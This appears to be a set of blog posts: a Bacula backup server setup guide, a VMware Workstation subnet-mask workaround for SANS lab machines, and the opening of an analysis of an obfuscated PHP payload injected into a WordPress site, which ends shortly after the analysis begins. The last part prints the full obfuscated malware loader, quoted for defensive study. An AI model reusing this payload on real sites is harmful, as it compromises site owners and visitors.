root@nas:~# apt-get update && apt-get upgrade
   root@nas:~# apt-get --no-install-recommends install bacula-director-mysql \
   bacula-console \
   bacula-doc \
   bacula-sd \
   bacula-sd-mysql

Static configuration of the components

Bacula is designed to be distributed over several servers if needed, the configuration for each component is also split into a separate file for each component with the exception of the catalog which is configured in the directors config file.

Catalog

The database that will handle the catalog exist on a separate host as explained earlier, so the installation cannot be done automatically by dbconfig-common. So I begin with creating a database and user on the remote host and then populate the database with initial meta data. Creating the database and user plus granting privileges to that user is relatively straight forward, if that is not the case for you, just Google it and you will find a lot of sites explaining it. There is an sh script located at /usr/share/bacula-director/make_mysql_tables which I copied, removed all traces of the script itself leaving only the SQL syntax and then used that as input to the mysql client.

root@nas:~# mysql -h db -u user -p database < ~/make_mysql_tables

The director component has to be configured to use the external database. Edit the Catalog resource found in /etc/bacula/bacula-dir.conf.

Catalog {
     Name = MyCatalog
     dbaddress = db
     dbport = 3306
     dbname = "database"
     dbuser = "user"
     dbpassword = "pass"
   }

Note that I have just written db for hostname, unless you have some magical values written in /etc/hosts, you should use an IP address or a FQDN.

Storage

On the NAS server I have mounted a share to /media/backup which is at this moment in time 637GB large. This share will be defined as a device in the storage daemons configuration file and will be the only device used for all backup purposes. If at a later time I need more space, I can create additional shares for Bacula to use.

root@nas:/home/hamartin# df -h | tail -1
   /dev/mapper/media-backup	637G  198M  605G   1% /media/backup
   root@nas:/home/hamartin#

The configuration for the storage daemon can be found at /etc/bacula/bacula-sd. We begin the configuration by defining the storage daemon itself.

Storage {
     Name = nas-sd
     SDPort = 9103
     SDAddress = 127.0.0.1
     Pid Directory = "/var/run/bacula"
     WorkingDirectory = "/var/lib/bacula"
     Maximum Concurrent Jobs = 2
   }

Each storage daemon must have a name which it uses for authentication and messaging purposes. Two or more storage daemons controlled by one director can not have the same name, meaning that two storage daemons can have the same name as long as they are distinct within one director. Although its possible to have storage daemons with the same name, I see no point in doing that. Take the time to create a proper naming policy instead. I set the amount of concurrent jobs to a maximum of 2 (default is 20), simply because I have no idea how to estimate what this value should be for my setup.

Now that the storage daemon has been defined it has to be made aware of which directors are allowed to contact and manage the daemon. The configuration will have two director definitions, one for management and control and one for monitoring. Each definition will have a name and a password that comes with it. This name and password will have to be identical to the ones that will be defined in the directors configuration file later and all names has to be unique within one directors configuration file. There will be several places within the configuration of this system where you will have to create new passwords. I chose to install pwgen and use it to generate secure and random passwords. Take a look here if you want to see the details.

Director {
     Name = nas-dir
     Password = "pass"
   }

   Director {
     Name = nas-mon
     Password = "pass"
     Monitor = yes
   }

Note that the second director definition has Monitor = yes set, which simply means that any director which uses that name and password to connect to this storage daemon only is able to monitor the daemon, not control it.

Next its time to define a device which the director can use to store data on and that the director can refer to in its configuration. How devices are configured here is dependent on what kind of hardware is being used. Since I will be using fixed storage space which is already mounted on the host system, my device resource will be relatively simple. In the scenario that a tape exchanger or similar is to be used, the device configuration for that will become more complex fast. Take a look at this post if you’re configuring Bacula to use tape exchangers.

Device {
     Name = NASBackup1
     Device Type = File
     Archive Device = "/media/backup"
     LabelMedia = Yes
     Random Access = Yes
     AutomaticMount = Yes
     RemovableMedia = No
     AlwaysOpen = No
   }

A logical name has been given to the device and the device is a File type, which means that it is a random access device and is fixed or removable. The device has been set to not always open, simply because for File types, this setting is ignored. Always open is specifically a Tape, Fifo and DVD settings which forces Bacula to keep the device open. This would also mean that the device can not be used for anything else as long as it is mounted within Bacula.

The last resource of the storage daemon configuration file defines where all messages created by the storage daemon is to be sent.

Messages {
     Name = Standard
     director = nas-dir = all
   }

Director

Now that the storage daemon has been configured with a place to store data and given the director allowance to monitor and control it, I now need to configure the director itself. This configuration file is extensive and I will only be utilizing a small part of it. The configuration file can be found at /etc/bacula/bacula-dir.conf. As with the storage daemon the director has to define itself to.

Director {
     Name = nas-dir
     DIRport = 9101
     DirAddress = 127.0.0.1
     QueryFile = "/etc/bacula/scripts/query.sql"
     WorkingDirectory = "/var/lib/bacula"
     PidDirectory = "/var/run/bacula"
     Maximum Concurrent Jobs = 1
     Password = "pass"
     Messages = Daemon
   }

The name and password for the director has to be copied to the console configuration file found at /etc/bacula/bconsole.conf. The maximum concurrent jobs were 1 by default, which confuses me since the storage daemon resource had a default of 20. Most messages has a designated destination, but there are some messages which does not have a designated destination and in those cases, they will be sent to the Daemon, which you will later see is an alias to send an email to a specific local user. In my case that will be the root user.

Console {
     Name = nas-mon
     Password = "pass"
     CommandACL = status, .status
   }

To be able to get messages, errors and warnings from Bacula messages need to be configured. I will configure the messages to be sent to root on the host itself. If you have functioning email setup on the server itself you have two options. Either configure the email address that Bacula should send the emails directly to in the Messages resource or you can send the emails to a local user and edit /etc/aliases to forward the email to an address of your choice. I like the latter best as this will forward any and all emails sent to that local user instead of just Bacula emails.

Messages {
     Name = Daemon
     mailcommand = "/usr/sbin/bsmtp -h localhost -f \"\(Bacula\) \<%r\>\" -s \"Bacula daemon message\" %r"
     mail = root = all, !skipped
     console = all, !skipped, !saved
     append = "/var/log/bacula/bacula.log" = all, !skipped
   }
   
   Messages {
     Name = Standard
     mailcommand = "/usr/sbin/bsmtp -h localhost -f \"\(Bacula\) \<%r\>\" -s \"Bacula: %t %e of %c %l\" %r"
     operatorcommand = "/usr/sbin/bsmtp -h localhost -f \"\(Bacula\) \<%r\>\" -s \"Bacula: Intervention needed for %j\" %r"
     mail = root = all, !skipped
     operator = root = mount
     console = all, !skipped, !saved
     append = "/var/log/bacula/bacula.log" = all, !skipped
     catalog = all
   }

Earlier, I defined the storage daemon, now I will link that storage daemon to this director by adding/editing a storage resource. The name is arbitrary, but should be descriptive as with all names defined in all the configuration files. The device should be the logical name of a device defined in the storage daemons configuration file and the media type is also arbitrary, but should be the same for all storage resources which are of the same type and support the same “things”. Do not under any circumstances unless you know exactly what you are doing, create two storage resources which point to the same device on the storage daemon. It is written in the documentation that this can make Bacula block and go into a deadlock. If there exist an auto changer for tapes, the auto changer device and not the individual tape station devices should be pointed to by this resource.

Storage {
     Name = File
     Address = 127.0.0.1
     SDPort = 9103
     Password = "pass"
     Device = NASBackup1
     Media Type = File
   }

Setting up jobs, schedules and clients

With the configuration I have done, the system should now be up and running, but it will do absolutely nothing other than occupy minimal amounts of resources on the server. Its time to configure the jobs in itself and schedule these jobs at certain intervals.

Generating secure passwords

Install the pwgen package first.

root@nas:~# apt-get install pwgen

An example on how to generate one secure password that has 32 alpha numerical characters.

root@nas:~# pwgen -s 32 1
   SYkGmfcSt0znPdw1CzYFUntY1fGUxH0G

Todo

Read and understand the best practices for creating a backup solution with Bacula with limited storage resources. Discuss adding local backup in addition to remote backup. Find out some possible solutions on how to find out how many concurrent tasks can be done at the same time without loosing performance.

Sources

• http://www.bacula.com/
• http://blog.bacula.org/whitepapers/CommunityDiskBackup.pdf
• http://defcon.no/sysadm/bacula-backup-server-on-debian-lenny-with-remote-sql-server/

I’m currently attending SANS SEC504: Hacker Tools, Techniques, Exploits and Incident Handling in London. For some of the labs in the course we need machines on the IPs 10.10.0.1 and 10.10.71.1 with a subnet mask of 255.255.0.0.

Changing the Subnet Mask for the NAT or host-only networks in VMware Workstation seems like such a easy thing to do. According to VMware it should be as easy as opening the Virtual Network Editor and “type a new value in the Subnet mask text box”.

Oh wait … I can’t change it. The field for subnet mask in the Virtual Network Editor is not editable.

Let’s keep googling - plenty matches, but everyone keeps insisting it can be changed in the GUI, or mixes the subnet mask with the subnet IP. Some posts blame permission, but since the Virtual Network Editor always runs as root, that’s not the problem. There are no listings for the vmnets in /etc/network/interfaces or /etc/network/interfaces.d/ and changing the subnet mask in NetworkManager does nothing.

After a lot of thinking (and just after I checked /etc/network/interfaces ) I found /etc/vmware/networking - BINGO! This looks like just the file we were looking for.

Before editing the file we should stop any vmware-related services that might use these files.

1
2

$ sudo service vm<TAB>
vmamqpd vmware vmware-USBArbitrator vmware-workstation-server

I’m not sure witch of these services use the files we are editing, so we’ll stop them all

1
2
3
4

$ sudo service vmamqpd
$ sudo service vmware
$ sudo service vmware-USBArbitrator
$ sudo service vmware-workstation-server

For the SANS course I have set up a new host-only network vmnet2. Since we are using static IPs, and will be running malware on these systems, I have disabled DHCP and not connected a host virtual adapter. The shared folder option Map as a network drive in Windows guests still work, don’t ask me how. Below is the configuration for vmnet2 with a subnet mask of 255.255.0.0.

1
2
3
4
5

answer VNET_2_DHCP no
answer VNET_2_DHCP_CFG_HASH E9892EF1006EBB5D4996DF1A377B10EB0D542B94
answer VNET_2_HOSTONLY_NETMASK 255.255.0.0
answer VNET_2_HOSTONLY_SUBNET 10.10.0.0
answer VNET_2_VIRTUAL_ADAPTER no

Success! (but continue reading, we update the DHCP configuration below the picture)

VMware stores DHCP config and leases in /etc/vmware/vmnet<NUM>/dhcpd/. If we have changed the subnet IP, subnet mask, or turned on or off DHCP, these files need to be updated. The configfile contains autogenerated information surronded by “DO NOT MODIFY SECTION”, so we should probably not edit it manually.

If we open VMware Virtual Network Editor (sudo vmware-netcfg), change a setting (e.g. the subnet IP from 10.10.0.0 to 10.11.0.0), save, and then change it back again, VMware will update the files for us.

In late July the following question was posted on a IRC-channel i frequent:

Anyone care to devise what an obfuscated PHP payload does?

Sure, why not, sounds like a challenge. This is part 1 of a series of blogposts explaining the headache-inducing three hours that followed.

The following snippet had been added to the top of every PHP file in a Wordpress installation. Scroll right to see it all. Far right.

1

<?php $fognhntadd = '825h>#]y31]278]y3e]81]K78:56985:6197g>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euh]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1;5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!f!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825b*[%x5c%x7825h!>!%x5c%x7825fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x78OJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787f%x35%165%x3a%146%x21%76c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gPpde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7%x5c%x78257-C)fepmqnjA%x5c%x78!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2px7822)gj6<^#Y#%x5c%x785cq%x5c%A)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#n2f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]27d}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x55c%x7825t2w>#]y74]273]y76]2x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273w6*3qj%x5c%x78257>%x5c%x782272qj%:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5mmvo:>:iuhofm%x5c%x7825:-5p function fjfgg($n){return chr(ord(]317]445]212]445]43]321]464]284]364]6]234]342x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x78%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x*w%x5c%x7825)kV%x5c%x7878{**f%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmx5c%x787f!>>%x5c%x7822!pd%x5c%x78254y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7%x78e%x5c%x78b%x5c%x7825mm)x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5x78257>%x5c%x782f7&6|7**111127-K)ebfsX5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%d%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce25z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j#)usbut%x5c%x7860cpV%x5c%x787f%x5c%n%x5c%x7825)utjm6<%x#-#}+;%x5c%x7825-qp%x5c%29%51%x29%73", NULL); }c%x7824gps)%x5c%x7825j>1<%x55c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x75c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x723ldfidk!~!<**qp%x5c%x7825!-uy82fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)!gj!|!*1?hmg%x5cx5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jx5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%opo#>b%x5c%x7825!*##>x7825)fnbozcYufhA%x5c%x78272qj%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%0hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7867825%x5c%x7824-%x5c%x7824!>!f%x21%50%x5c%x7825%x5c%x7878:!x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,475c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPtjw!>!#]y84]275]y83]248]y85tmw!>!#]y84]275]y83]273]y76]277#<%x824-%x5c%x7824%x5c%x785c%x5c%x7825j^%5)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%y3:]84#-!OVMM*<%x22%51%xc%x7860msvd},;uqpuft%x5c%x7860msvd}+%x5c%x7827u%x5c%x7825)7fc%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVP5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj$n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%|!*bubE{h%x5c%x7825)j{h782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782ftuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4x7825>U<#16,47R57,27R66,#%x5c%x782fq%xisset($GLOBALS["%x61%156%x75x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x77eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-<!%x5c%x7825o:!>!%x5c%x78:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv%x7825):fmji%x5c%x7878%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N"%x6f%142%x5f%163%x74%141%x72%164") && (!]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#us%x5c%x7860sfqmbdf)%x5c%x7825%x5c%mji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x78257L6M7]D4]275]D:M8]Df#<%25>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%xc%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hm827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5cx7825%x5c%x7827Y%x5c%x7825652]y85]256]y6g]257]y86]267]y74]275]y725eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c}X;!sp!*#opo#>>}R;msv}.;}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk]y81]265]y72]254]y76]61]yh%x5c%x7825!<*::::::-111112)eobs%xnpd!opjudovg!|!**#j{hnpd#)tutj%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%xc%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UF7825)3of:opjudovg<~%x5c%x78245]K2]285]Ke]53Ld]53]Kc]55Ld]551%x6d%160%x6c%157%x64%145%x28%141%x72NFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUU#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!27&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#5#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<C787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x73]256]y81]265]y72]254]y76#<%x5c%x782x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%xrfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x782tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftm8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%>#]y3g]61]y3f]63]y3:]68]y76#<jepdoF.uofuopD#)sfebfI{jg!)%x5c%x7825z>>2*!%x5I&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{htussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x782%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5cx7825!<***f%x5c%x7827,*e%xufs:~:<*9-1-r%x5c%x7825)s%x5c%x825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:4>X)!gjZ<#opo#>b%x5c%x7825!**1y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!qj%x5c%x78256<*Y%x5c%c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvs57UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpm8pmpusut)tpqssutRe%x5c%x7825)Rc%x7825z>3<!fmtf!%x5c%x7825z>2<!c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x5c%x7824Ypp3)%x5c%x7825cB%x5cvodujpo)##-!#~<#%x5c%x782f%x5c%x%x5c%x7825w6Z6<.5%x5}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78254-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5x5c%x7878;0]=])0#)U!%x5c%x7fu%x5c%x7825)3of)fepdo%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7>q%x5c%x7825V<*#fopoV;ho0hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7861]y35]256]y76]72]y3d]51]y35]274dXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5f!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!o0hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<if((function_exists(x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x69%164%50%x22%134%x78%62***b%x5c%x7825)sf%x5c%x7878pmpusut!38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{6R25,d7R17,67R37,#%x5c%x782fq%x5c%82f#@#%x5c%x782fqp%x5c%x7825>5o!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~x7860ufldpt}X;%x5c%x7860msv%x5c%x782f#%x5c%x782f#%x5c%x782f},;x29%57%x65","%x65%166%x61%154%x28%1%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x552985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84])!gj}Z;h!opjudovg}{;#)sv%x5c%x78256<C>^#zsfvr#%5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]24%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;5wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5yqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]52c%163%x74%162%x5f%163%x70%154%3]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x%x7825j:>>1*!%x5c%x7825b:>1<!fmtf19275j{hnpd19275fubmgoj{h1:|:*7825>%x5c%x782fh%x5c%x7825:<pd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%svufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<g%x5c%x7825!<12>j%x5c%x7825!|!*#95c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]2565%x5c%x7824-%x5c%x7824*!|!%x5c%x744#)zbssb!>!ssbnpe_GMFT%x)!gj!~<ofmy%x5c%x7825,3,j%x5c%x78<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gj:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3yf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x782:<##:>:h%x5c%x7825:<#6**#57]38y]47]67y]37]88y5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#66~6<&w6<%x5c%x787fw6*CW&)7gj6fepmqnj!%x5c%x782f!#0#)idubn%x5c%x786c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x78X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)3!Ypp2)%x5c%x7825zB%x5c%x7825z>!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%825-#1GO%x5c%x7822#)fepmqyfAx787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X/(.*)/epreg_replacempfqsmkdas'; $sjeykdhzzn = explode(chr((238-194)),'7526,20,4122,41,3639,28,183,52,1382,35,3350,59,7933,35,5453,38,5299,60,8374,31,7588,25,608,23,2791,29,6137,29,448,56,6954,20,3549,52,2698,64,7212,55,7416,54,3917,50,2092,20,1914,40,1876,38,3197,24,4247,61,792,39,5973,48,6738,53,7298,61,5359,36,562,46,1212,33,1153,59,6651,21,2590,31,7546,42,2442,64,8079,25,2506,63,907,30,4817,27,5140,70,3303,47,831,30,5700,62,408,40,6853,39,2621,34,3258,45,4635,64,7697,62,9690,30,4308,50,8242,36,3489,60,7871,27,1063,63,3161,36,9942,69,1695,35,8057,22,6021,69,7359,57,8602,68,9358,36,3093,44,2820,56,343,38,8825,33,4450,60,132,51,2419,23,4699,48,8670,33,6604,47,3409,23,5269,30,9116,67,861,46,7136,52,10011,28,37,45,937,59,8559,43,6424,26,2187,70,7792,30,5235,34,235,51,7613,35,9315,43,3743,45,9720,37,2655,43,6791,30,1954,66,8800,25,2942,52,5491,62,6212,68,2569,21,6576,28,9807,41,2322,30,7114,22,1644,51,286,57,4997,24,7898,35,2112,24,5907,66,5819,52,6280,61,8501,30,1355,27,726,66,9879,63,3788,43,2057,35,10039,67,2876,66,7759,33,3601,38,9439,39,7188,24,6166,23,1616,28,5553,43,5021,66,3221,37,7087,27,4747,70,1550,66,8104,70,4358,69,2994,26,5871,36,3020,36,1126,27,4844,37,3992,70,6450,31,8531,28,9416,23,3880,37,2352,67,6387,37,4062,22,9394,22,1730,60,6481,48,7648,49,5395,29,3967,25,9640,50,4163,49,8858,69,8767,33,3056,37,1462,48,7968,46,4579,56,4212,35,9573,67,3667,26,3693,50,7035,52,2159,28,8927,69,6922,32,2762,29,8330,44,7267,31,5596,38,6892,30,1510,40,4881,68,6672,66,7822,49,9848,31,6341,46,8278,52,631,49,9183,62,2257,65,0,37,1245,57,8014,43,6529,47,6090,47,1817,59,680,46,4427,23,8174,68,5424,29,5762,57,381,27,4949,48,9518,55,82,50,9058,58,1417,45,4510,69,3432,57,4084,38,6974,61,8996,62,8468,33,5634,66,1302,53,9757,50,2020,37,7470,56,6189,23,6821,32,5087,53,1790,27,9478,40,3831,49,504,58,996,67,8405,63,8703,64,5210,25,9245,70,3137,24,2136,23'); $jekjvzbupt=substr($fognhntadd,(67419-57313),(30-23)); if (!function_exists('otmxvqaaam')) { function otmxvqaaam($kruvavlbfw, $tmpdlccpfv) { $knpzekviot = NULL; for($mektnikgre=0;$mektnikgre<(sizeof($kruvavlbfw)/2);$mektnikgre++) { $knpzekviot .= substr($tmpdlccpfv, $kruvavlbfw[($mektnikgre*2)],$kruvavlbfw[($mektnikgre*2)+1]); } return $knpzekviot; };} $wrewusbqxp="\x20\57\x2a\40\x67\172\x6d\143\x69\170\x72\146\x69\146\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x33\55\x31\64\x36\51\x29\54\x20\143\x68\162\x28\50\x33\66\x31\55\x32\66\x39\51\x29\54\x20\157\x74\155\x78\166\x71\141\x61\141\x6d\50\x24\163\x6a\145\x79\153\x64\150\x7a\172\x6e\54\x24\146\x6f\147\x6e\150\x6e\164\x61\144\x64\51\x29\51\x3b\40\x2f\52\x20\151\x61\153\x78\144\x62\143\x6b\156\x72\40\x2a\57\x20"; $flwwfkzecg=substr($fognhntadd,(50154-40041),(83-71)); $flwwfkzecg($jekjvzbupt, $wrewusbqxp, NULL); $flwwfkzecg=$wrewusbqxp; $flwwfkzecg=(419-298); $fognhntadd=$flwwfkzecg-1; ?>

After adding some newlines and replacing some strings with placeholders we can read the code without pondering our political stance.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

<?php
$fognhntadd = '<horribly long string of non-random characters>';

